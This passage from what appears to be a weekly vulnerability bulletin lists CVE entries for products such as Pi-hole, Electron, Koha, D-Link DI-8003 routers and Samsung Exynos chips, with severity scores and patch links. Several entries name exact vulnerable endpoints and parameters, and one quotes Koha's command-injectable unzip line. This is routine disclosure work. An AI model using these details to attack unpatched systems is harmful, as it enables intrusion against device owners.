| Mattermost--Mattermost | Mattermost Plugins versions <=2.3.1 fail to limit the request body size on the {{/lifecycle}} webhook endpoint which allows an authenticated attacker to cause memory exhaustion and denial of service via sending an oversized JSON payload. Mattermost Advisory ID: MMSA-2026-00610 | 2026-04-09 | 3.7 | CVE-2026-21388 | MMSA-2026-00610 |
| Dell--PowerProtect Agent | Dell PowerProtect Agent Service, version(s) prior to 20.1, contain(s) an Incorrect Permission Assignment for Critical Resource vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Information exposure. | 2026-04-08 | 3.3 | CVE-2026-28264 | https://www.dell.com/support/kbdoc/en-us/000447277/dsa-2026-158-security-update-dell-powerprotect-data-manager-for-multiple-security-vulnerabilities |
| pi-hole--web | Pi-hole Admin Interface is a web interface for managing Pi-hole, a network-level ad and internet tracker blocking application. From 6.0 to before 6.5, client hostnames and IP addresses from the FTL database are rendered into the DOM without escaping in network.js (Network page) and charts.js/index.js (Dashboard chart tooltips). While upstream validation in dnsmasq and FTL blocks HTML characters via normal DHCP/DNS paths, the web UI performs no output escaping - an inconsistency with other fields in the same file that are properly escaped. This vulnerability is fixed in 6.5. | 2026-04-06 | 3.4 | CVE-2026-33404 | https://github.com/pi-hole/web/security/advisories/GHSA-px6w-85wp-ww9v |
| pi-hole--web | Pi-hole Admin Interface is a web interface for managing Pi-hole, a network-level ad and internet tracker blocking application. From 6.0 to before 6.5, the formatInfo() function in queries.js renders data.upstream, data.client.ip, and data.ede.text into HTML without escaping when a user expands a query row in the Query Log, enabling stored HTML injection. JavaScript execution is blocked by the server's CSP (script-src 'self'). The same fields are properly escaped in the table view (rowCallback), confirming the omission was an oversight. This vulnerability is fixed in 6.5. | 2026-04-06 | 3.1 | CVE-2026-33405 | https://github.com/pi-hole/web/security/advisories/GHSA-jx8x-mj2r-62vq |
| OpenStack--Keystone | An issue was discovered in OpenStack Keystone 14 through 26 before 26.1.1, 27.0.0, 28.0.0, and 29.0.0. Restricted application credentials can create EC2 credentials. By using a restricted application credential to call the EC2 credential creation API, an authenticated user with only a reader role may obtain an EC2/S3 credential that carries the full set of the parent user's S3 permissions, effectively bypassing the role restrictions imposed on the application credential. Only deployments that use restricted application credentials in combination with the EC2/S3 compatibility API (swift3 / s3api) are affected. | 2026-04-10 | 3.5 | CVE-2026-33551 | https://bugs.launchpad.net/keystone/+bug/2142138 https://security.openstack.org/ossa/OSSA-2026-005.html |
| harttle--liquidjs | LiquidJS is a Shopify / GitHub Pages compatible template engine in pure JavaScript. Prior to 10.25.3, the replace filter in LiquidJS incorrectly accounts for memory usage when the memoryLimit option is enabled. It charges str.length + pattern.length + replacement.length bytes to the memory limiter, but the actual output from str.split(pattern).join(replacement) can be quadratically larger when the pattern occurs many times in the input string. This allows an attacker who controls template content to bypass the memoryLimit DoS protection with approximately 2,500x amplification, potentially causing out-of-memory conditions. This vulnerability is fixed in 10.25.3. | 2026-04-08 | 3.7 | CVE-2026-34166 | https://github.com/harttle/liquidjs/security/advisories/GHSA-mmg9-6m6j-jqqx https://github.com/harttle/liquidjs/commit/abc058be0f33d6372cd2216f4945183167abeb25 https://github.com/harttle/liquidjs/releases/tag/v10.25.3 |
| electron--electron | Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. From 33.0.0-alpha.1 to before 39.8.5, 40.8.5, 41.1.0, and 42.0.0-alpha.5, apps that use offscreen rendering with GPU shared textures may be vulnerable to a use-after-free. Under certain conditions, the release() callback provided on a paint event texture can outlive its backing native state, and invoking it after that point dereferences freed memory in the main process, which may lead to a crash or memory corruption. Apps are only affected if they use offscreen rendering with webPreferences.offscreen: { useSharedTexture: true }. Apps that do not enable shared-texture offscreen rendering are not affected. To mitigate this issue, ensure texture.release() is called promptly after the texture has been consumed, before the texture object becomes unreachable. This vulnerability is fixed in 39.8.5, 40.8.5, 41.1.0, and 42.0.0-alpha.5. | 2026-04-06 | 2.3 | CVE-2026-34764 | https://github.com/electron/electron/security/advisories/GHSA-8x5q-pvf5-64mp |
| electron--electron | Electron is a framework for writing cross-platform desktop applications using JavaScript, HTML and CSS. Prior to 39.8.5, 40.8.5, 41.1.0, and 42.0.0-alpha.5, apps that call clipboard.readImage() may be vulnerable to a denial of service. If the system clipboard contains image data that fails to decode, the resulting null bitmap is passed unchecked to image construction, triggering a controlled abort and crashing the process. Apps are only affected if they call clipboard.readImage(). Apps that do not read images from the clipboard are not affected. This issue does not allow memory corruption or code execution. This vulnerability is fixed in 39.8.5, 40.8.5, 41.1.0, and 42.0.0-alpha.5. | 2026-04-07 | 2.8 | CVE-2026-34781 | https://github.com/electron/electron/security/advisories/GHSA-f37v-82c4-4x64 |
Severity Not Yet Assigned
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| chamilo--chamilo-lms | Chamilo LMS is a learning management system. From 1.11.0 to 2.0-beta.1, anyone can trigger a malicious redirect through the use of the redirect parameter to /login. This vulnerability is fixed in 2.0-beta.2. | 2026-04-10 | not yet calculated | CVE-2025-66447 | https://github.com/chamilo/chamilo-lms/security/advisories/GHSA-m82x-prv3-rwwv https://github.com/chamilo/chamilo-lms/commit/73ae6293adaa6098374bc22625342dbae5cbc446 |
| n/a--Stakeholder-Specific Vulnerability Categorization (SSVC) | QD 20230821 is vulnerable to Server-side request forgery (SSRF) via a crafted request | 2026-04-08 | not yet calculated | CVE-2023-46945 | https://qd-today.github.io/qd/ https://gist.github.com/kurokoleung/5b36b2013a54adadcce79967d3e4f056 |
| n/a--Koha 23.05.10 | Koha Library before 23.05.10 fails to sanitize user-controllable filenames prior to unzipping, leading to remote code execution. The line "qx/unzip $filename -d $dirname/;" in upload-cover-image.pl is vulnerable to command injection via shell metacharacters because input data can be controlled by an attacker and is directly included in a system command, i.e., an attack can occur via malicious filenames after uploading a .zip file and clicking Process Images. | 2026-04-07 | not yet calculated | CVE-2024-36057 | https://gitlab.com/koha-community/Koha/-/blob/23.05.x/misc/release_notes/release_notes_23_05_10.md https://gitlab.com/koha-community/Koha/-/blob/23.05.x/misc/release_notes/release_notes_23_05_11.md https://github.com/hacklantic/Research/tree/main/CVE-2024-36057 https://koha-community.org/koha-22-05-22-released/ |
| n/a--Koha 23.05.10 | The Send Basket functionality in Koha Library before 23.05.10 is susceptible to Time-Based SQL Injection because it fails to sanitize the POST parameter bib_list in /cgi-bin/koha/opac-sendbasket.pl, allowing library users to read arbitrary data from the database. | 2026-04-07 | not yet calculated | CVE-2024-36058 | https://gitlab.com/koha-community/Koha/-/blob/23.05.x/misc/release_notes/release_notes_23_05_10.md https://gitlab.com/koha-community/Koha/-/blob/23.05.x/misc/release_notes/release_notes_23_05_11.md https://koha-community.org/koha-22-05-22-released/ https://github.com/hacklantic/Research/tree/main/CVE-2024-36058 |
| Unknown--YML for Yandex Market | The YML for Yandex Market WordPress plugin before 5.0.26 is vulnerable to Remote Code Execution via the feed generation process. | 2026-04-10 | not yet calculated | CVE-2025-14545 | https://wpscan.com/vulnerability/9bb1a4ca-976c-461d-82de-8a3b04a56fbc/ |
| Canonical--Ubuntu | In Ubuntu, Subiquity version 24.04.4 could leak sensitive user credentials during crash reporting. Upon installation failure, if a user submitted a bug report to Launchpad, Subiquity could include certain user credentials, such as the user's plaintext Wi-Fi password, in the attached logs. | 2026-04-09 | not yet calculated | CVE-2025-14551 | noble backport - stop logging network config and identity data Stop logging identity data and network secrets |
| Mitsubishi Electric Corporation--GENESIS64 | Cleartext Storage of Sensitive Information vulnerability in Mitsubishi Electric GENESIS64 versions 10.97.3 and prior, Mitsubishi Electric ICONICS Suite versions 10.97.3 and prior, Mitsubishi Electric MobileHMI versions 10.97.3 and prior, Mitsubishi Electric Hyper Historian versions 10.97.3 and prior, Mitsubishi Electric AnalytiX versions 10.97.3 and prior, Mitsubishi Electric GENESIS versions 11.02 and prior, Mitsubishi Electric MC Works64 all versions, Mitsubishi Electric Iconics Digital Solutions GENESIS64 versions 10.97.3 and prior, Mitsubishi Electric Iconics Digital Solutions ICONICS Suite versions 10.97.3 and prior, Mitsubishi Electric Iconics Digital Solutions MobileHMI versions 10.97.3 and prior, Mitsubishi Electric Iconics Digital Solutions Hyper Historian versions 10.97.3 and prior, Mitsubishi Electric Iconics Digital Solutions AnalytiX versions 10.97.3 and prior, and Mitsubishi Electric Iconics Digital Solutions GENESIS versions 11.02 and prior allows a local attacker to disclose the SQL Server credentials stored in plaintext within the local SQLite file by exploiting this vulnerability, when the local caching feature using SQLite is enabled and SQL authentication is used for the SQL Server authentication. As a result, the unauthorized attacker could access the SQL Server and disclose, tamper with, or destroy data on the server, potentially cause a denial-of-service (DoS) condition on the system. | 2026-04-08 | not yet calculated | CVE-2025-14815 | https://www.mitsubishielectric.com/psirt/vulnerability/pdf/2025-023_en.pdf https://jvn.jp/vu/JVNVU90646130/ https://www.cisa.gov/news-events/ics-advisories/icsa-26-097-01 |
| Mitsubishi Electric Corporation--GENESIS64 | Cleartext Storage of Sensitive Information in GUI vulnerability in Mitsubishi Electric GENESIS64 versions 10.97.3 and prior, Mitsubishi Electric ICONICS Suite versions 10.97.3 and prior, Mitsubishi Electric MobileHMI versions 10.97.3 and prior, Mitsubishi Electric Hyper Historian versions 10.97.3 and prior, Mitsubishi Electric AnalytiX versions 10.97.3 and prior, Mitsubishi Electric GENESIS versions 11.02 and prior, Mitsubishi Electric MC Works64 all versions, Mitsubishi Electric Iconics Digital Solutions GENESIS64 versions 10.97.3 and prior, Mitsubishi Electric Iconics Digital Solutions ICONICS Suite versions 10.97.3 and prior, Mitsubishi Electric Iconics Digital Solutions MobileHMI versions 10.97.3 and prior, Mitsubishi Electric Iconics Digital Solutions Hyper Historian versions 10.97.3 and prior, Mitsubishi Electric Iconics Digital Solutions AnalytiX versions 10.97.3 and prior, and Mitsubishi Electric Iconics Digital Solutions GENESIS versions 11.02 and prior allows a local attacker to disclose the SQL Server credentials displayed in plain text in the GUI of the Hyper Historian Splitter feature by exploiting this vulnerability, when SQL authentication is used for the SQL Server authentication. As a result, the unauthorized attacker could access the SQL Server and disclose, tamper with, or destroy data on the server, potentially cause a denial-of-service (DoS) condition on the system. | 2026-04-08 | not yet calculated | CVE-2025-14816 | https://www.mitsubishielectric.com/psirt/vulnerability/pdf/2025-023_en.pdf https://www.cisa.gov/news-events/ics-advisories/icsa-26-097-01 https://jvn.jp/vu/JVNVU90646130/ |
| Semtech--LR1110 | An improper access control vulnerability exists in Semtech LoRa LR11xxx transceivers running early versions of firmware where the memory write command accessible via the physical SPI interface fails to enforce write protection on the program call stack. An attacker with physical access to the SPI interface can overwrite stack memory to hijack program control flow and achieve limited arbitrary code execution. However, the impact is limited to the active attack session: the device's secure boot mechanism prevents persistent firmware modification, the crypto engine isolates cryptographic keys from direct firmware access, and all modifications are lost upon device reboot or loss of physical access. | 2026-04-07 | not yet calculated | CVE-2025-14857 | https://www.semtech.com/company/security/security-bulletins/sem-psa-2026-001 |
| Semtech--LR1110 | The Semtech LR11xx LoRa transceivers running early versions of firmware contains an information disclosure vulnerability in its firmware validation functionality. When a host issues a firmware validity check command via the SPI interface, the device decrypts the provided encrypted firmware package block-by-block to validate its integrity. However, the last decrypted firmware block remains uncleared in memory after the validation process completes. An attacker with access to the SPI interface can subsequently issue memory read commands to retrieve the decrypted firmware contents from this residual memory, effectively bypassing the firmware encryption protection mechanism. The attack requires physical access to the device's SPI interface. | 2026-04-07 | not yet calculated | CVE-2025-14858 | https://www.semtech.com/company/security/security-bulletins/sem-psa-2026-001 |
| Semtech--LR1110 | The Semtech LR11xx LoRa transceivers implement secure boot functionality using digital signatures to authenticate firmware. However, the implementation uses a non-standard cryptographic hashing algorithm that is vulnerable to second preimage attacks. An attacker with physical access to the device can exploit this weakness to generate a malicious firmware image with a hash collision, bypassing the secure boot verification mechanism and installing arbitrary unauthorized firmware on the device. | 2026-04-07 | not yet calculated | CVE-2025-14859 | https://www.semtech.com/company/security/security-bulletins/sem-psa-2026-001 |
| Canonical--Ubuntu | In Ubuntu, ubuntu-desktop-provision version 24.04.4 could leak sensitive user credentials during crash reporting. Upon installation failure, if a user submitted a bug report to Launchpad, ubuntu-desktop-provision could include the user's password hash in the attached logs. | 2026-04-09 | not yet calculated | CVE-2025-15480 | feat: don't log identity data (noble backport) feat: don't log identity data |
| Unknown--Popup Box | The Popup Box WordPress plugin before 5.5.0 does not properly validate nonces in the add_or_edit_popupbox() function before saving popup data, allowing unauthenticated attackers to perform Cross-Site Request Forgery attacks. When an authenticated admin visits a malicious page, the attacker can create or modify popups with arbitrary JavaScript that executes in the admin panel and frontend. | 2026-04-07 | not yet calculated | CVE-2025-15611 | https://wpscan.com/vulnerability/089ea763-2421-4089-a220-251421f7f226/ |
| Ping Identity--PingIDM | An insufficient granularity of access control vulnerability exists in PingIDM (formerly ForgeRock Identity Management) where administrators cannot properly configure access rules for Remote Connector Servers (RCS) running in client mode. This means attackers can spoof a client-mode RCS (if one exists) to intercept and/or modify an identity's security-relevant properties, such as passwords and account recovery information. This issue is exploitable only when an RCS is configured to run in client mode. | 2026-04-07 | not yet calculated | CVE-2025-20628 | https://backstage.forgerock.com/knowledge/advisories/article/a14305629?rev=_newest https://backstage.pingidentity.com/downloads/browse/idm/featured |
| Nokia--MantaRay NM | Nokia MantaRay NM is vulnerable to an OS command injection vulnerability due to improper neutralization of special elements used in an OS command in Symptom Collector application. | 2026-04-07 | not yet calculated | CVE-2025-24817 | https://www.nokia.com/we-are-nokia/security/product-security-advisory/cve-2025-24817/ |
| Nokia--MantaRay NM | Nokia MantaRay NM is vulnerable to an OS command injection vulnerability due to improper neutralization of special elements used in an OS command in Log Search application. | 2026-04-07 | not yet calculated | CVE-2025-24818 | https://www.nokia.com/we-are-nokia/security/product-security-advisory/cve-2025-24818/ |
| Nokia--MantaRay NM | Nokia MantaRay NM is vulnerable to a Relative Path Traversal vulnerability due to improper validation of input parameter on the file system in Software Manager application. | 2026-04-07 | not yet calculated | CVE-2025-24819 | https://www.nokia.com/we-are-nokia/security/product-security-advisory/cve-2025-24819/ |
| Checkmk GmbH--Checkmk | Local privilege escalation in Checkmk 2.2.0 (EOL), Checkmk 2.3.0 before 2.3.0p46, Checkmk 2.4.0 before 2.4.0p25, and Checkmk 2.5.0 (beta) before 2.5.0b3 allows a site user to escalate their privileges to root, by manipulating files in the site context that are processed when the `omd` administrative command is run by root. | 2026-04-07 | not yet calculated | CVE-2025-39666 | https://checkmk.com/werk/18891 |
| n/a--OwnTone - open source (audio) media server | owntone-server 2ca10d9 is vulnerable to Buffer Overflow due to lack of recursive checking. | 2026-04-10 | not yet calculated | CVE-2025-44560 | https://github.com/owntone/owntone-server/issues/1873 https://gist.github.com/wenwenyuyu/517851c3fe38c4f97b2d1940597da2d3 |
| D-Link[.]com -- D-Link DI-8300 | D-Link DI-8300 v16.07.26A1 was discovered to contain a buffer overflow via the ip parameter in the ip_position_asp function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2026-04-08 | not yet calculated | CVE-2025-45057 | https://www.dlink.com/en/security-bulletin/ https://www.dlink.com.cn/techsupport/ProductInfo.aspx?m=DI-8300 https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8300 | D-Link DI-8300 v16.07.26A1 was discovered to contain a buffer overflow via the fx parameter in the jingx_asp function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2026-04-08 | not yet calculated | CVE-2025-45058 | https://www.dlink.com/en/security-bulletin/ https://www.dlink.com.cn/techsupport/ProductInfo.aspx?m=DI-8300 https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8300 | D-Link DI-8300 v16.07.26A1 was discovered to contain a buffer overflow via the fn parameter in the tgfile_htm function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted input. | 2026-04-08 | not yet calculated | CVE-2025-45059 | https://www.dlink.com/en/security-bulletin/ https://www.dlink.com.cn/techsupport/ProductInfo.aspx?m=DI-8300 https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| www[.]rrweb[.]io/ -- rrwebplayer | A cross-site scripting (XSS) vulnerability in rrweb-snapshot before v2.0.0-alpha.18 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. | 2026-04-09 | not yet calculated | CVE-2025-45806 | https://github.com/rrweb-io/rrweb https://github.com/rrweb-io/rrweb/tree/master/packages/rrweb-snapshot https://github.com/rrweb-io/rrweb/issues/1817 |
| Google--Android | In importWrappedKey of KMKeymasterApplet.java, there is a possible way access keys that should be restricted due to improper input validation. This could lead to local information disclosure with no additional execution privileges needed. User interaction is not needed for exploitation. | 2026-04-06 | not yet calculated | CVE-2025-48651 | https://source.android.com/docs/security/bulletin/2026/2026-04-01 |
| n/a--n/a | Jizhicms v2.5.4 is vulnerable to Server-Side Request Forgery (SSRF) in User Evaluation, Message, and Comment modules. | 2026-04-09 | not yet calculated | CVE-2025-50228 | https://github.com/Cherry-toto/jizhicms https://www.jizhicms.cn https://github.com/Cherry-toto/jizhicms/issues/104 |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper validation of user input in the qj.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50644 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A vulnerability has been discovered in D-Link DI-8003 16.07.26A1, which can lead to a buffer overflow when the s parameter in the pppoe_list_opt.asp endpoint is manipulated. By sending a crafted request with an excessively large value for the s parameter, an attacker can trigger a buffer overflow condition. | 2026-04-08 | not yet calculated | CVE-2025-50645 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to insufficient input validation on the name parameter in the /qos_type_asp.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50646 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1, specifically in the handling of the wans parameter in the qos.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50647 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to inadequate input validation in the /tggl.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50648 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper input validation in the vlan_name parameter in the /shut_set.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50649 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to inadequate validation of input size in the routes_static parameter in the /router.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50650 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | An issue in D-Link DI-8003 16.07.26A1 related to improper handling of the id parameter in the /saveparm_usb.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50652 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of the name and mem parameters in the /time_group.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50653 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper validation of the id parameter in the /thd_member.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50654 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of the name parameter in the /thd_group.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50655 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of the pid parameter in the /trace.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50657 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of the custom_error parameter in the /user.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50659 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of the name parameter in the /url_member.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50660 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of multiple parameters in the /url_rule.asp endpoint. An attacker can exploit this vulnerability by sending a crafted HTTP GET request with parameters name, en, ips, u, time, act, rpri, and log. | 2026-04-08 | not yet calculated | CVE-2025-50661 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of the name parameter in the /url_group.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50662 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of the name parameter in the /usb_paswd.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50663 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of parameters in the /user_group.asp endpoint. The attacker can exploit this vulnerability by sending a crafted HTTP GET request with parameters name, mem, pri, and attr. | 2026-04-08 | not yet calculated | CVE-2025-50664 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of input parameters in the /web_keyword.asp endpoint. An attacker can exploit this vulnerability by sending a crafted HTTP GET request via the name, en, time, mem_gb2312, and mem_utf8 parameters. | 2026-04-08 | not yet calculated | CVE-2025-50665 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of multiple parameters in the /web_post.asp endpoint. An attacker can exploit this vulnerability by sending a crafted HTTP GET request in parameters such as name, en, user_id, log, and time. | 2026-04-08 | not yet calculated | CVE-2025-50666 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of the iface parameter in the /wan_line_detection.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50667 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of the s parameter in the /web_list_opt.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50668 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 and DI-8003G 19.12.10A1 due to improper handling of the wan_ping parameter in the /wan_ping.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50669 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of parameters in the /xwgl_bwr.asp endpoint. An attacker can exploit this vulnerability by sending a crafted HTTP GET request in the name, qq, and time parameters. | 2026-04-08 | not yet calculated | CVE-2025-50670 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of parameters in the /xwgl_ref.asp endpoint. An attacker can exploit this vulnerability by sending a crafted HTTP GET request with excessively long strings in parameters name, en, user_id, shibie_name, time, act, log, and rpri. | 2026-04-08 | not yet calculated | CVE-2025-50671 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of parameters in the /yyxz_dlink.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50672 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | A buffer overflow vulnerability exists in D-Link DI-8003 16.07.26A1 due to improper handling of the http_lanport parameter in the /webgl.asp endpoint. | 2026-04-08 | not yet calculated | CVE-2025-50673 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| Tendacn[.]com -- AC6 WiFi Router | Tenda AC6 15.03.05.16_multi is vulnerable to Buffer Overflow in the formSetCfm function via the funcname, funcpara1, and funcpara2 parameters. | 2026-04-08 | not yet calculated | CVE-2025-52221 | https://github.com/faqiadegege/IoTVuln/blob/main/tendaAc6_formSetCfm_funcname_overflow/detail.md https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| D-Link[.]com -- D-Link DI-8003 | D-Link DI-8003 v16.07.26A1, DI-8500 v16.07.26A1; DI-8003G v17.12.21A1, DI-8200G v17.12.20A1, DI-8200 v16.07.26A1, DI-8400 v16.07.26A1, DI-8004w v16.07.26A1, DI-8100 v16.07.26A1, and DI-8100G v17.12.20A1 were discovered to contain a buffer overflow via the rd_en, rd_auth, rd_acct, http_hadmin, http_hadminpwd, rd_key, and rd_ip parameters in the radius_asp function. This vulnerability allows attackers to cause a Denial of Service (DoS) via a crafted request. | 2026-04-08 | not yet calculated | CVE-2025-52222 | https://www.dlink.com/en/security-bulletin/ https://github.com/xiaotea/iot-vulnerability-collection/blob/main/README.md |
| Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Processor Exynos | An issue was discovered in the Wi-Fi driver in Samsung Mobile Processor and Wearable Processor Exynos 980, 850, 1280, 1330, 1380, 1480, 1580, W920, W930, and W1000. Incorrect Handling of the NL80211 vendor command leads to a buffer overflow via a certain ioctl message, issue 1 of 2. | 2026-04-07 | not yet calculated | CVE-2025-52908 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-52908/ |
| Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Processor Exynos | An issue was discovered in the Wi-Fi driver in Samsung Mobile Processor and Wearable Processor Exynos 980, 850, 1280, 1330, 1380, 1480, 1580, W920, W930, and W1000. Incorrect Handling of the NL80211 vendor command leads to a buffer overflow via a certain ioctl message, issue 2 of 2. | 2026-04-07 | not yet calculated | CVE-2025-52909 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-52909/ |
| Semiconductor[.]Samsung[.]com -- Mobile Processor & Wearable Processor Exynos | An issue was discovered in NAS in Samsung Mobile Processor, Wearable Processor, and Modem Exynos 980, 990, 850, 1080, 2100, 1280, 2200, 1330, 1380, 1480, 2400, 1580, 2500, 9110, W920, W930, W1000, Modem 5123, Modem 5300, and Modem 5400. Incorrect Handling of a DL NAS Transport packet leads to a Denial of Service. | 2026-04-06 | not yet calculated | CVE-2025-54324 | https://semiconductor.samsung.com/support/quality-support/product-security-updates/ https://semiconductor.samsung.com/support/quality-support/product-security-updates/cve-2025-54324/ |
